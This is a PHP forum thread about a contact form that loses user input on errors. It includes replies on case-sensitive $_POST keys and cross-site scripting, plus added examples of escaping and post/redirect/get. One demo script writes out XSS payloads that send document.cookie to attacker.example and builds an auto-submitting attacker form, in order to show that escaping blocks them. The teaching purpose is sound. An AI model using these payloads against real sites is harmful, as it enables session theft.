PHP Server Side Scripting Forum
form data disappears
When user encounters an error, data disappears
jamescurl
msg:4536806, 11:51 am on Jan 17, 2013 (gmt 0)
Hi, I am new to webmasterworld.com.
I am stuck on trying to get my code to work.
On the contact form, if a user doesn't fill out a required field, then an error appears with what they must do, but their data has disappeared. Below is the code I currently have.
Any help would be greatly appreciated.

<?php session_start(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="css/lightbox.css" rel="stylesheet" />
</head>

<body>
<?php

if (isset($_POST['submit'])) {
    $error = "";

    if (!empty($_POST['Name'])) {
        $name = $_POST['Name'];
    } else {
        $error .= "You didn't type in your name. <br />";
    }

    if (!empty($_POST['Email'])) {
        $email = $_POST['Email'];
        if (!preg_match("/^[_a-z0-9]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/i", $email)) {
            $error .= "The e-mail address you entered is not valid. <br/>";
        }
    } else {
        $error .= "You didn't type in an e-mail address. <br />";
    }

    if (!empty($_POST['Message'])) {
        $message = $_POST['Message'];
    } else {
        $error .= "You didn't type in a message. <br />";
    }

    // Telephone is optional; default it so the mail body below never reads an undefined variable.
    $telephone = '';
    if (!empty($_POST['Telephone'])) {
        $telephone = $_POST['Telephone'];
    }

    // captcha.php stores the expected value in the session; compare it with what was typed.
    if (($_POST['code']) == $_SESSION['code']) {
        $code = $_POST['code'];
    } else {
        $error .= "The captcha code you entered does not match. Please try again. <br />";
    }

    if (empty($error)) {
        $from = 'From: ' . $name . ' <' . $email . '>';
        $to = "email@emial.com";
        $subject = "Message from website";
        $content = " From: " . $name . "\n Phone number: " . $telephone . "\n Message: " . $message;
        $success = "<h3>Thank you! Your message has been sent!</h3>";
        mail($to, $subject, $content, $from);
    }
}
?>

<p>&nbsp;</p>
<table align="center" width="1090" border="0" >
<tr>
<td valign="top">
<div class="Contactpage-BG">
<table border="0" align="left" width="100%">

<tr>
<td>
</td>

</tr>
<tr>
<td align="left">
<div class="Testimonial">
<div class="Contact-BG">

<div class="Contact-Midleft">

</div>
<div class="Contact-text">
<p class="Contact-text"><i> *Compulsory Fields</i> </p>
</div>

<form method="post" action="" >
<table width="600" height="531" border="0" cellpadding="0">
<tr>
<td width="111" height="28" class="Contact-text"><div class="Contactboxes-name-label">*Name:</div></td>
<td colspan="2">
<input name="Name" type="text" class="Contactboxes-name" id="Name" value="<?php echo $_POST['name']; ?>"/>
</td>
</tr>
<tr>
<td height="28" class="Contact-text"><div class="Contactboxes-email-label">*Email:</div></td>
<td colspan="2"><input name="Email" type="text" size="60" class="Contactboxes-email" id="Email" value="<?php echo $_POST['email']; ?>"/></td>
</tr>
<tr>
<td height="28" class="Contact-text"><div class="Contactboxes-telephone-label"> Telephone:</div></td>
<td colspan="2"><input name="Telephone" type="text" class="Contactboxes-telephone" id="Telephone" value="<?php echo $_POST['telephone']; ?>"/></td>
</tr>
<tr>
<td height="139" valign="top" class="Contact-text"><div class="Contactboxes-message-label">*Message:</div></td>
<td colspan="2"><textarea name="Message" cols="56" rows="11" class="Contacttextarea" id="Message"><?php echo $_POST['message']; ?></textarea></td>
</tr>
<tr>
<td valign="top" class="Contact-text"><div class="Contactboxes-spam-label">*Anti-SpamBot Code:</div></td>
<td colspan="2" valign="top"><div class="Contactboxes-spam">Please enter the numbers you see in this image<br />
into the box below</div></td>
</tr>
<tr>
<td height="51">&nbsp;</td>
<td width="209" valign="top"><div class="Captchaimagebox"><label><img src="captcha.php"></label></div></td>
<td width="252" rowspan="3" valign="top">
<?php
if (!empty($error)) {
echo '<p class="error"><font color="#FF0000"><strong>Your message was NOT sent</strong></font><br/>' . $error . '</p>';
} elseif (!empty($success)) {
echo $success;
}
?>
</td>
</tr>
<tr>
<td height="48">&nbsp;</td>
<td valign="top"><input name="code" type="text" class="Captchabox"></td>
</tr>
<tr>
<td height="65">&nbsp;</td>
<td><input type="submit" class="Contact-Send" name="submit" value="" /></td>
</tr>

</table>
<p>
<div class="contactfields">
<label for="Name"></label></div></p>
</form>


</div>
<div class="Contact-Midright"></div>
</div>



</td>

</tr>

</table>


</div>
</td>
</tr>
</table>
</body>
</html>

swa66
msg:4536809, 12:17 pm on Jan 17, 2013 (gmt 0)

Hash keys for arrays are case-sensitive.


<input name="Email" type="text" size="60" class="Contactboxes-email" id="Email" value="<?php echo $_POST['email']; ?>"/>

See the "Email" used to send it to you and the "email" used to send it back?

That said, this is a classic example of a website vulnerable to Cross Site Scripting (XSS) - well at least once you fix this.

Ref: [owasp.org...]
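As an added example (not code from the thread), one small helper applies both points of the reply above at once: it reads each posted field back under exactly the name the form used, and HTML-escapes it before it is echoed into the page. The helper name old() is my choice; the field names are the ones from the posted form. It runs on PHP 5.4 or later.

```php
<?php
// Added example, not code from the thread: safe repopulation of the form
// fields after a validation error.
//
// Array keys are case-sensitive: $_POST['Name'] (what the form posts) and
// $_POST['name'] (what the original template reads) are two different,
// unrelated entries, which is why the fields came back empty.
function old($field)
{
    // First page load, or a field that was not posted at all: return an
    // empty string. This also avoids the "Undefined index" notice that the
    // original echo of $_POST['name'] raises on the first GET.
    if (!isset($_POST[$field]) || !is_string($_POST[$field])) {
        return '';
    }
    // ENT_QUOTES escapes " and ' as well as < > &, so the value can neither
    // close the value="" attribute it sits in nor the <textarea> it is
    // printed into. That is the XSS fix the reply refers to.
    return htmlspecialchars($_POST[$field], ENT_QUOTES, 'UTF-8');
}
?>
<!-- The four fields from the posted form, looked up under their real names. -->
<input name="Name" type="text" class="Contactboxes-name" id="Name" value="<?php echo old('Name'); ?>" />
<input name="Email" type="text" size="60" class="Contactboxes-email" id="Email" value="<?php echo old('Email'); ?>" />
<input name="Telephone" type="text" class="Contactboxes-telephone" id="Telephone" value="<?php echo old('Telephone'); ?>" />
<textarea name="Message" cols="56" rows="11" class="Contacttextarea" id="Message"><?php echo old('Message'); ?></textarea>
```

The is_string() check matters because a request can send Name[]=x, which makes $_POST['Name'] an array; echoing that would raise a notice and print "Array". Nothing else in the handler needs to change for the repopulation to work, but the handler's own echo of $error is still built from fixed strings only, so it is fine as it is.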

jamescurl
msg:4536822, 1:20 pm on Jan 17, 2013 (gmt 0)

Thanks swa66,
That works perfectly.
You're a star.

swa66
msg:4536857, 3:44 pm on Jan 17, 2013 (gmt 0)

I hope you fixed the XSS security bugs. Remember that any XSS affects your entire site - not just the vulnerable element itself.

jamescurl
msg:4537965, 2:17 pm on Jan 21, 2013 (gmt 0)

What XSS security bugs? And how do I fix them?
With the form, if the user has filled out the form successfully, a message says that it has been sent, but the data in the fields is still there. Any way to correct this?
Kind Regards
James

swa66
msg:4537981, 3:06 pm on Jan 21, 2013 (gmt 0)

Anywhere you send back unfiltered input is an XSS vulnerability.

How to fix them: see the link to owasp above for a comprehensive answer.

In essence: make sure there is no HTML in the input that goes back to the user - yes, that's all it takes to have an XSS vulnerability.

Simply changing < > " ' and & to their respective htmlentities is enough in the cases you've shown so far.
htmlencode() is ok too - but it's not a generic solution in all possible cases - you should escape those things that in the context of where you output them can hurt you.

jamescurl
msg:4537994, 3:44 pm on Jan 21, 2013 (gmt 0)

Will this correct the issue of the data still being there once the user has clicked on "Send" and all the fields are completed correctly?
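The question above (fields still filled in after a successful send) is not answered directly anywhere in the thread. As an added example that is not from the thread, this is the usual way to get both behaviours: on a successful mail() the handler stores a flag in the session and redirects the browser back to the same page with GET (post/redirect/get), so the page is rendered from an empty $_POST and the fields come up blank, while the error path still repopulates them. A side effect worth having is that a refresh of the thank-you page can no longer resend the message. It assumes the script is called contact.php, that captcha.php stores its value in $_SESSION['code'] as the posted code implies, and that the form's fields are unchanged apart from echoing $values[...]. The e-mail check uses filter_var() in place of the thread's regex; that is a swap of mine.

```php
<?php
// Added example, not code from the thread: the handler half of contact.php,
// with the post/redirect/get step that leaves the fields empty after success.
session_start();

$error   = '';
$success = '';
$values  = array('Name' => '', 'Email' => '', 'Telephone' => '', 'Message' => '');

// The GET that follows a successful POST: show the thank-you exactly once.
// $_POST is empty on this request, so every field renders blank.
if (!empty($_SESSION['contact_sent'])) {
    unset($_SESSION['contact_sent']);
    $success = '<h3>Thank you! Your message has been sent!</h3>';
}

if (isset($_POST['submit'])) {
    // Read each field under its exact, case-sensitive name; ignore arrays.
    foreach (array_keys($values) as $field) {
        if (isset($_POST[$field]) && is_string($_POST[$field])) {
            $values[$field] = trim($_POST[$field]);
        }
    }

    if ($values['Name'] === '') {
        $error .= "You didn't type in your name. <br />";
    } elseif (preg_match('/[\r\n]/', $values['Name'])) {
        // Name is written into the From: header below; a line break in it
        // would let the sender append mail headers (e.g. Bcc:) of their own.
        $error .= "Your name may not contain line breaks. <br />";
    }

    if ($values['Email'] === '') {
        $error .= "You didn't type in an e-mail address. <br />";
    } elseif (filter_var($values['Email'], FILTER_VALIDATE_EMAIL) === false) {
        // Used instead of the thread's regex; it rejects line breaks as well.
        $error .= "The e-mail address you entered is not valid. <br />";
    }

    if ($values['Message'] === '') {
        $error .= "You didn't type in a message. <br />";
    }

    // Strict string comparison: no numeric coercion as with ==.
    $code = isset($_POST['code']) ? (string) $_POST['code'] : '';
    if (!isset($_SESSION['code']) || $code !== (string) $_SESSION['code']) {
        $error .= "The captcha code you entered does not match. Please try again. <br />";
    }

    if ($error === '') {
        $to      = 'email@emial.com';      // recipient as in the posted code
        $subject = 'Message from website';
        $content = " From: " . $values['Name']
                 . "\n Phone number: " . $values['Telephone']
                 . "\n Message: " . $values['Message'];
        $from    = 'From: ' . $values['Name'] . ' <' . $values['Email'] . '>';

        if (mail($to, $subject, $content, $from)) {
            $_SESSION['contact_sent'] = true;
            unset($_SESSION['code']);  // a used captcha value is not accepted again
            // 303 makes the browser fetch contact.php with GET, so a refresh
            // of the thank-you page cannot resend the message.
            header('Location: contact.php', true, 303);
            exit;
        }
        $error .= "The message could not be sent. Please try again later. <br />";
    }
}
?>
<!-- In the form, each field echoes its escaped value; after the redirect these are all empty. -->
<input name="Name" type="text" class="Contactboxes-name" id="Name" value="<?php echo htmlspecialchars($values['Name'], ENT_QUOTES, 'UTF-8'); ?>" />
```

The $success and $error variables are then displayed exactly where the posted template already prints them. The line-break check on Name is there because the posted code concatenates Name into the From: header unchecked; the e-mail regex in the thread is anchored, but the name is not validated at all.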

swa66
msg:4538037, 5:49 pm on Jan 21, 2013 (gmt 0)

It doesn't matter that you do not echo back upon success; anywhere there is a possibility for echoing back unfiltered content is more than enough for an attacker to exploit it - even an error page is plenty of an opportunity.
The attacker does not need to use your form ... they can make their own (it might not even look like a form at all; just a button or link is enough for them). If you process the input and send unfiltered output back: you lose (and/or your users lose).

What attackers do with XSS is insert javascript in the input, and then it runs in the context of your website - hence having access to e.g. the cookies the browser has to authenticate -> it then forwards those to the attacker, allowing him access.

Don't output unfiltered user input: running it through htmlencode() before you output it will remove most of the problems. Actually, there are functional problems solved there too.
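As an added example that is not part of the thread, here is the attack the post above describes, made concrete for the posted form: one constructed value for Name closes the value="" attribute of the input, one for Message closes the <textarea>, and both are harmless once run through htmlspecialchars() with ENT_QUOTES (PHP has no htmlencode(); htmlspecialchars() or htmlentities() is the function meant). It also shows the attacker's own auto-submitting page. The hosts attacker.example and victim.example and the payloads are constructed for the demo; the script runs stand-alone from the command line with php.

```php
<?php
// Added example, not code from the thread. Run with:  php xss_demo.php
// Shows why echoing $_POST back unescaped is an XSS hole, and that escaping
// for the output context closes it. Nothing here touches a browser.

// htmlspecialchars() with ENT_QUOTES turns < > & " and ' into entities, so a
// value can neither close the attribute it is printed into nor the element
// around it. (There is no htmlencode() in PHP.)
function h($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Constructed attacker payloads. The first closes the value="..." attribute of
// the Name input, the second closes the Message <textarea>; both then load an
// image whose URL carries document.cookie to the attacker's host.
$evilName    = '"><script>(new Image).src="http://attacker.example/?c="+document.cookie;</script><i x="';
$evilMessage = '</textarea><script>(new Image).src="http://attacker.example/?c="+document.cookie;</script><textarea>';

// The attribute context of the original  value="<?php echo $_POST['name']; ?>"
function renderNameField($value, $escape)
{
    $v = $escape ? h($value) : $value;
    return '<input name="Name" type="text" value="' . $v . '" />';
}

// The element-content context of the original <textarea>...</textarea>
function renderMessageField($value, $escape)
{
    $v = $escape ? h($value) : $value;
    return '<textarea name="Message">' . $v . '</textarea>';
}

// A live <script start tag in the fragment means the browser would run it.
function containsScriptTag($html)
{
    return stripos($html, '<script') !== false;
}

// The attacker does not use the real form: a page on their own host posts the
// payload to the contact page and submits itself (victim.example is assumed).
// The attacker escapes the value inside their own page; the browser decodes
// it again before posting, so the contact page receives the raw payload.
$attackerPage = '<form method="post" action="http://victim.example/contact.php">'
    . '<input type="hidden" name="Name" value="' . h($evilName) . '" />'
    . '<input type="hidden" name="Email" value="a@b.com" />'
    . '<input type="hidden" name="Message" value="x" />'
    . '<input type="hidden" name="submit" value="1" />'
    . '</form><script>document.forms[0].submit();</script>';

$cases = array(
    'Name, unescaped'    => renderNameField($evilName, false),
    'Name, escaped'      => renderNameField($evilName, true),
    'Message, unescaped' => renderMessageField($evilMessage, false),
    'Message, escaped'   => renderMessageField($evilMessage, true),
);

foreach ($cases as $label => $html) {
    $verdict = containsScriptTag($html) ? 'SCRIPT RUNS' : 'inert text';
    echo $label, ': ', $verdict, "\n", $html, "\n\n";
}
echo "Attacker's page:\n", $attackerPage, "\n";
```

Note that the attacker's POST fails the captcha check, which changes nothing: the handler then renders the error page, and the error page echoes Name straight back into the attribute, which is the "even an error page is plenty of an opportunity" point. Marking the session cookie HttpOnly keeps document.cookie from exposing it, but the injected script still runs as the site and can do anything the visitor can; escaping on output is the fix.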
